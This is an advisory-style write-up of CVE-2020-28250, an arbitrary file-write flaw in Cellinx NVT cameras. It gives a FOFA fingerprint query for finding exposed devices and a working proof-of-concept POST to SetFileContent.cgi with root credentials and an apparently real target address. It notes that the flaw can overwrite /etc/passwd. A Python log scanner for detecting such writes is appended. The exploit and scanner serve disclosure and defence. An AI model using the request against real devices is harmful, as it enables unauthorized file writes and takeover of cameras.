Cellinx NVT camera SetFileContent.cgi PATH parameter arbitrary file creation vulnerability (CVE-2020-28250)
fofa
body="local/NVT-string.js"
An attacker can create and write arbitrary files through SetFileContent.cgi, for example overwriting /etc/passwd, to gain privileges on the server.
POC
POST /cgi-bin/SetFileContent.cgi?USER=root&PWD=D1D1D1D1D1D1D1D1D1D1D1D1A2A2B0A1D1D1D1D1D1D1D1D1D1D1D1D1D1D1B8D1&PATH=/etc/html/testdsad11.txt HTTP/1.1
Host: 1.222.228.4
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Content-Length: 11

testcontent

GET /local/testdsad11.txt HTTP/1.1
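
Log detection for the request pattern above, added here as an example and not part of the original write-up: it scans web access logs for SetFileContent.cgi calls carrying a PATH parameter, normalizes the target path, and marks writes that the same client then fetches back. The combined log format, the sample lines and the /etc/html/ to /local/ mapping (inferred from the PoC) are assumptions.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (documentation addresses, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2021:10:00:00 +0000] "POST /cgi-bin/SetFileContent.cgi?USER=root&PWD=XXXX&PATH=/etc/html/probe.txt HTTP/1.1" 200 2
192.0.2.10 - - [01/Jan/2021:10:00:01 +0000] "GET /local/probe.txt HTTP/1.1" 200 11
192.0.2.11 - - [01/Jan/2021:10:05:00 +0000] "POST /cgi-bin/SetFileContent.cgi?USER=root&PWD=XXXX&PATH=%2Fetc%2Fpasswd HTTP/1.1" 200 2
192.0.2.12 - - [01/Jan/2021:10:06:00 +0000] "GET /local/NVT-string.js HTTP/1.1" 200 900
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
WEB_ROOT = "/etc/html/"  # assumption from the PoC: files here are served under /local/


def scan(log_text):
    """Return one finding per SetFileContent.cgi write seen in the log."""
    findings, pending = [], {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, method, target, status = m.groups()
        url = urlsplit(target)
        if url.path.lower().endswith("/setfilecontent.cgi"):
            # parse_qs percent-decodes, so PATH=%2Fetc%2Fpasswd is caught too
            for raw in parse_qs(url.query).get("PATH", []):
                path = posixpath.normpath(raw)  # collapses ../ sequences
                in_webroot = path.startswith(WEB_ROOT)
                finding = {
                    "client": client,
                    "path": path,
                    "kind": "webroot-write" if in_webroot else "system-file-write",
                    "status": int(status),
                    "fetched_back": False,
                }
                findings.append(finding)
                if in_webroot:
                    pending[(client, "/local/" + path[len(WEB_ROOT):])] = finding
        elif method == "GET" and status == "200":
            hit = pending.get((client, url.path))
            if hit:
                hit["fetched_back"] = True  # write followed by retrieval
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
```

A finding with kind system-file-write, or a webroot-write with fetched_back set, is the signal to prioritize when triaging device logs.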